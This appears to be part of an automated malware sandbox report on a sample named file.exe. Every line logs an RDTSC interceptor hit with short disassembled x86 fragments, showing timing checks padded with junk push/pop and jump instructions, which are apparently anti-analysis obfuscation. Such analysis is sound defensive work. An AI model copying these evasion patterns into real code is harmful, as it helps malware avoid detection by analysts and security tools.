Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B9D8 second address: A1B9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FEEE0EE3606h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A671 second address: A1A679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A227CD second address: A227D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A217EE second address: A217F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A217F5 second address: A21827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FEEE0EE3623h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FEEE0EE3613h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22136 second address: A2213B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A224A1 second address: A224A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A224A5 second address: A224B3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A224B3 second address: A224BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A248B2 second address: A248BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A248BC second address: A248C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A02 second address: A24A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A08 second address: A24A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A14 second address: A24A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27CAE second address: A27CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99472D second address: 994732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994732 second address: 994779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEE0EE360Fh 0x00000008 jmp 00007FEEE0EE360Fh 0x0000000d jp 00007FEEE0EE3606h 0x00000013 jmp 00007FEEE0EE3611h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FEEE0EE3606h 0x00000021 jno 00007FEEE0EE3606h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27505 second address: A2751F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEE08A2314h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2751F second address: A27531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Ch 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27531 second address: A2755B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007FEEE08A2313h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2755B second address: A27561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2784D second address: A2785D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A230Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A279A5 second address: A279C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEE0EE3613h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A279C0 second address: A279C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B180 second address: 99B19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3615h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B19E second address: 99B1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E56D second address: A2E594 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FEEE0EE3612h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 je 00007FEEE0EE3606h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E594 second address: A2E5A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E5A0 second address: A2E5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E705 second address: A2E71F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A2314h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E71F second address: A2E723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E723 second address: A2E727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EB80 second address: A2EB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2ED2A second address: A2ED2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2ED2E second address: A2ED32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2ED32 second address: A2ED62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A230Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE08A2317h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2ED62 second address: A2ED7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEE0EE3615h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EF03 second address: A2EF5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FEEE08A230Fh 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEEE08A2319h 0x0000001e jns 00007FEEE08A231Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EF5B second address: A2EF6E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE0EE360Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33BAC second address: A33BC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEE08A230Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34138 second address: A34142 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3440B second address: A3440F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3440F second address: A34413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34413 second address: A3441D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34E0C second address: A34E66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEEE0EE3606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FEEE0EE361Dh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007FEEE0EE3617h 0x00000019 jmp 00007FEEE0EE3617h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37976 second address: A379AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEE08A2306h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FEEE08A2316h 0x00000011 pushad 0x00000012 js 00007FEEE08A2306h 0x00000018 jns 00007FEEE08A2306h 0x0000001e popad 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37EC4 second address: A37EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37EC8 second address: A37ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37ECC second address: A37EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE360Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37EE3 second address: A37EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37EE9 second address: A37F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE360Bh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FEEE0EE360Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37F08 second address: A37F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FEEE08A2332h 0x0000000b jmp 00007FEEE08A2313h 0x00000010 jmp 00007FEEE08A2319h 0x00000015 jbe 00007FEEE08A2312h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37F47 second address: A37F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DE4D second address: A3DE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DE53 second address: A3DE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEE0EE3611h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DE6C second address: A3DE70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DE70 second address: A3DE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DE7A second address: A3DE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E37F second address: A3E385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E62A second address: A3E65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A230Dh 0x00000009 pushad 0x0000000a jbe 00007FEEE08A2306h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FEEE08A2313h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E65E second address: A3E662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E914 second address: A3E919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E919 second address: A3E91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F7D5 second address: A3F7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A2312h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44809 second address: A44813 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44813 second address: A44819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439BC second address: A439C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439C0 second address: A439C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439C6 second address: A439E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3612h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439E7 second address: A439EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439EE second address: A43A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEE0EE360Fh 0x00000008 jg 00007FEEE0EE3606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43CE9 second address: A43CEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43CEE second address: A43CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44104 second address: A4410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4410A second address: A44136 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEE0EE3606h 0x00000008 jns 00007FEEE0EE3606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007FEEE0EE361Ch 0x00000016 jmp 00007FEEE0EE3616h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44136 second address: A4414C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4414C second address: A44150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44150 second address: A4415C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4415C second address: A44160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A443E9 second address: A443EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A443EF second address: A44412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FEEE0EE3611h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4457E second address: A44599 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEE08A2306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FEEE08A230Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50F83 second address: A50F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE3617h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50F9E second address: A50FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FEEE08A2306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jne 00007FEEE08A2306h 0x00000013 jmp 00007FEEE08A2319h 0x00000018 pop edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5112B second address: A5115F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEEE0EE3617h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5115F second address: A51165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51165 second address: A51169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51169 second address: A51187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEE08A2306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FEEE08A230Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A513FD second address: A5140E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5140E second address: A51414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51414 second address: A5141A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A515CA second address: A5160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FEEE08A2312h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEEE08A230Fh 0x00000012 pushad 0x00000013 jmp 00007FEEE08A2311h 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A518D7 second address: A518DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A519EE second address: A519F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51B9D second address: A51BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51BA2 second address: A51BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51D0B second address: A51D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51D11 second address: A51D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEE08A230Eh 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A589FA second address: A589FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
